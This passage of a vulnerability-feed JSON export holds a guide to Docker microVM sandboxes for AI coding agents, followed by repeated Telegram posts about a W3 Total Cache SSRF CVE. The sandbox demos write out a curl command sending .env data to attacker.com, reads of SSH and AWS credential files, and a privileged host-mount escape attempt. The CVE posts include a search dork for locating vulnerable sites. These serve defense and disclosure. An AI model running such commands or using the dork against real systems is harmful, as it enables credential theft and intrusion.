damage inside \u2014 your actual machine stays completely untouched.\n\nEach sandbox is an isolated microVM with its own kernel, Docker daemon, filesystem, and network stack. On Mac, that's Apple's Virtualization Framework. On Windows, Hyper-V. Actual hypervisor-level isolation.\n\n**You don't need Docker Desktop.** The `sbx` CLI is standalone.\n\n### How they work\n\n`sbx run claude` \u2192\n1. Boots a microVM with a dedicated kernel\n2. Mounts only your project workspace (read-write)\n3. Starts an isolated Docker daemon inside\n4. Routes all network through a policy-enforcing proxy\n5. Injects credentials at proxy level \u2014 never visible inside the sandbox\n6. Launches agent in full autonomous mode (no permission prompts)\n\n### Four layers of isolation\n\n| Layer | What it does |\n|-------|-------------|\n| VM isolation | Separate kernel \u2014 can't touch yours |\n| Private Docker | Agent builds/runs containers with zero visibility into host Docker |\n| Network isolation | Can't reach localhost or other sandboxes; outbound goes through filtering proxy |\n| Filesystem isolation | Only workspace syncs; ~/.ssh, ~/.aws, other projects invisible |\n\n### Why not containers?\n\nDocker started with containers for this but moved away:\n\n- **Shared kernel** \u2014 kernel exploit inside container hits your host OS\n- **Docker-in-Docker problem** \u2014 agents need Docker access. Options: privileged mode (tears down isolation) or mount host socket (gives full access to everything). Both bad.\n\nMicroVMs solve both: dedicated kernel + private Docker daemon.\n\n---\n\n## Setup\n\n```bash\n# Install (macOS)\nbrew install docker/tap/sbx\n\n# Install (Windows \u2014 enable HypervisorPlatform first)\nwinget install -h Docker.sbx\n\n# Install (Linux)\nsudo apt-get install docker-sbx\nsudo usermod -aG kvm $USER &amp;&amp; newgrp kvm\n\n# Login\nsbx login\n\n# Store API key (saved in OS keychain, never in sandbox)\nsbx secret set ANTHROPIC_API_KEY\n```\n\nFirst login prompts for a network policy: **Open** | **Balanced** (recommended) | **Locked Down**\n\n---\n\n## Running Agents\n\n```bash\ncd ~/projects/my-app\nsbx run claude          # Claude Code\nsbx run codex           # OpenAI Codex\nsbx run copilot         # GitHub Copilot\nsbx run gemini          # Gemini CLI\nsbx run kiro            # Kiro\nsbx run shell           # Plain shell (for demos)\n```\n\nAgent starts in YOLO mode \u2014 no permission prompts. It can only see `/workspace/`.\n\n### Key commands\n\n| Command | What it does |\n|---------|-------------|\n| `sbx` | TUI dashboard (status, network, firewall) |\n| `sbx ls` | List sandboxes |\n| `sbx exec  -- bash` | Shell into running sandbox |\n| `sbx stop ` | Pause |\n| `sbx rm ` | Destroy |\n| `sbx policy ls` | View network rules |\n| `sbx policy log` | Audit: allowed + blocked requests |\n| `sbx policy allow network -g ` | Allowlist a domain |\n| `sbx ports publish  3000` | Forward port to host |\n| `sbx run claude --branch feature-x` | Git worktree isolation |\n| `sbx secret set ` | Store credential |\n| `sbx save` | Snapshot as template |\n\n---\n\n## The Workflow\n\n1. `sbx run claude` \u2014 agent starts in isolated microVM\n2. Turn it loose on any task \u2014 it works autonomously\n3. Changes sync to your real project directory (bidirectional, paths preserved)\n4. `sbx policy log` \u2014 see everything it did\n5. `sbx rm` \u2014 sandbox gone, code stays\n\nThe sandbox is invisible to `docker ps`. It's a separate management plane.\n\n---\n\n## Demos\n\n### Filesystem isolation\n\n```bash\n# Inside sandbox\nls -la ~/\n# \u2192 Almost nothing. No .aws, no .ssh, no personal files.\n\n# On your host\nls -la ~/\n# \u2192 Everything. All your secrets, all your files.\n```\n\n### Network policy enforcement\n\n```bash\n# ping-test.sh tries to reach an external IP\n./ping-test.sh\n# \u2192 ping: command not found (not pre-installed)\n\napt-get install -y iputils-ping\n./ping-test.sh\n# \u2192 Network is unreachable \u2014 BLOCKED by policy\n\n# Check audit log from host\nsbx policy log\n# \u2192 Shows: 3 blocked attempts to 198.51.100.1 (matches -c 3 in script)\n```\n\n### Credential exfiltration\n\n```bash\ncat ~/.aws/credentials        # \u2192 No such file\ncat ~/.ssh/id_rsa             # \u2192 No such file\ncurl https://attacker.com/exfil -d \"$(cat .env)\"  # \u2192 BLOCKED + logged\n```\n\n### Docker socket escape\n\n```bash\ndocker ps                     # \u2192 Sandbox containers only\ndocker run -v /:/host --privileged alpine cat /host/etc/shadow\n# \u2192 Shows sandbox FS, not host. Host unreachable.\n```\n\n### Port forwarding\n\n```bash\n# Inside sandbox: start a server\nnpm install &amp;&amp; npm run dev -- --host 0.0.0.0 --port 3000\n\n# From host: forward the port\nsbx ports publish  3000\n\n# Open http://localhost:3000 \u2014 app visible in browser\n```\n\n---\n\n## Local Models (LM Studio / Ollama)\n\n```bash\n# Allow sandbox to reach local model server\nsbx policy allow network -g localhost:1234\n\n# Create and run sandbox with local model\nsbx create --name codex-local codex .\nsbx exec codex-local -- codex \\\n  --provider openai \\\n  --model  \\\n  --api-url http://host.docker.internal:1234/v1\n```\n\nLocal models are less capable \u2014 MORE likely to make mistakes. Sandboxing them is arguably more important than sandboxing frontier models.\n\n---\n\n## Customization\n\nSandbox VM is built from a Dockerfile. Customize your tooling:\n\n```dockerfile\nFROM ubuntu:24.04\nRUN apt-get update &amp;&amp; apt-get install -y git curl nodejs npm \\\n    &amp;&amp; npx playwright install --with-deps chromium\n```\n\nTeach agents to use custom tools via project skills (`CLAUDE.md`, `.cursorrules`).\n\n---\n\n## What the Sandbox Does NOT Protect\n\nYour **project files are fully writable**. The agent CAN delete or overwrite your code.\n\nThe sandbox protects your **system**. It does NOT protect your **project**.\n\n**Mitigation:** Commit often. Use `--branch` mode for risky tasks.\n\n---\n\n## Resource Overhead\n\n| | Container | Docker Sandbox |\n|--|-----------|----------------|\n| Disk | ~tens of MB | ~5\u20136 GB |\n| Memory | Shared | 4 GB per sandbox |\n\nRunning multiple agents in parallel adds up fast. Only sandbox agents that need guardrails.\n\n---\n\n## AI Governance (Enterprise)\n\n| Control | What it governs |\n|---------|----------------|\n| Sandbox Policy | Network + filesystem rules |\n| Credential Governance | Session-scoped tokens, exfiltration blocking |\n| MCP Tool Governance | Approved servers only |\n| Role-Based Policy | SAML/SCIM, team-specific rules |\n| Audit &amp; Visibility | Every action logged \u2192 SIEM |\n\n---\n\n## Takeaway: The 3Cs\n\n| C | Principle | How |\n|---|-----------|-----|\n| **Contain** | Limit what agents reach | `sbx run` (microVM) |\n| **Control** | Govern what agents do | Network + MCP policies |\n| **Clarity** | See what agents did | `sbx policy log` |\n\n---\n\n## Known Gotchas\n\n| Issue | Workaround |\n|-------|------------|\n| ~5-6 GB disk per sandbox | Only sandbox what needs guardrails |\n| 4 GB memory per sandbox | Watch resources with multiple agents |\n| No SSH-agent/1Password | Unsigned commits \u2192 rebase-sign locally |\n| macOS requires Apple Silicon | Intel not supported |\n| Windows support experimental | Use at own risk |\n| Linux: container-based (weaker) | microVM only on Mac/Windows |\n| Env var change = recreate sandbox | Loses conversation history |\n| Project files fully writable | Commit early, push often |\n\n---\n\n*Sagar Utekar \u2014 Docker Captain | Senior SRE, CrowdStrike | CNCF Ambassador | @SagarUtekar*\n", "creation_timestamp": "2026-05-29T18:31:33.000000Z"}, {"uuid": "d17cacc6-1e50-4c99-9585-c2e5713f717c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://t.me/brutsecurity/1306", "content": "CVE-2024-12365: Missing Authorization in W3 Total Cache WordPress Plugin, 8.5 rating\u2757\ufe0f\n\nThe vulnerability allows an authenticated attacker to access sensitive data and make unauthorized web requests to collect information from internal services.\n\nSearch at Netlas.io:\n\ud83d\udc49 Link: https://nt.ls/BpOAJ\n\ud83d\udc49 Dork: http.body:\"plugins/w3-total-cache\"\n\nRead more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache/w3-total-cache-281-authenticated-subscriber-missing-authorization-to-server-side-request-forgery", "creation_timestamp": "2026-07-09T03:00:10.239164Z"}, {"uuid": "d838a0b7-c574-42bd-89aa-c9f2ae576429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://t.me/brutsecurity/1306", "content": "CVE-2024-12365: Missing Authorization in W3 Total Cache WordPress Plugin, 8.5 rating\u2757\ufe0f\n\nThe vulnerability allows an authenticated attacker to access sensitive data and make unauthorized web requests to collect information from internal services.\n\nSearch at Netlas.io:\n\ud83d\udc49 Link: https://nt.ls/BpOAJ\n\ud83d\udc49 Dork: http.body:\"plugins/w3-total-cache\"\n\nRead more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache/w3-total-cache-281-authenticated-subscriber-missing-authorization-to-server-side-request-forgery", "creation_timestamp": "2026-07-10T00:00:33.925323Z"}, {"uuid": "e23a442a-94ee-452b-848f-e47cb0b67571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1306", "content": "CVE-2024-12365: Missing Authorization in W3 Total Cache WordPress Plugin, 8.5 rating\u2757\ufe0f\n\nThe vulnerability allows an authenticated attacker to access sensitive data and make unauthorized web requests to collect information from internal services.\n\nSearch at Netlas.io:\n\ud83d\udc49 Link: https://nt.ls/BpOAJ\n\ud83d\udc49 Dork: http.body:\"plugins/w3-total-cache\"\n\nRead more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache/w3-total-cache-281-authenticated-subscriber-missing-authorization-to-server-side-request-forgery", "creation_timestamp": "2026-07-11T15:00:04.860452Z"}, {"uuid": "8c004887-e448-46f6-8bdd-f1888f0f3c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1306", "content": "CVE-2024-12365: Missing Authorization in W3 Total Cache WordPress Plugin, 8.5 rating\u2757\ufe0f\n\nThe vulnerability allows an authenticated attacker to access sensitive data and make unauthorized web requests to collect information from internal services.\n\nSearch at Netlas.io:\n\ud83d\udc49 Link: https://nt.ls/BpOAJ\n\ud83d\udc49 Dork: http.body:\"plugins/w3-total-cache\"\n\nRead more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache/w3-total-cache-281-authenticated-subscriber-missing-authorization-to-server-side-request-forgery", "creation_timestamp": "2026-07-12T00:00:46.958525Z"}]}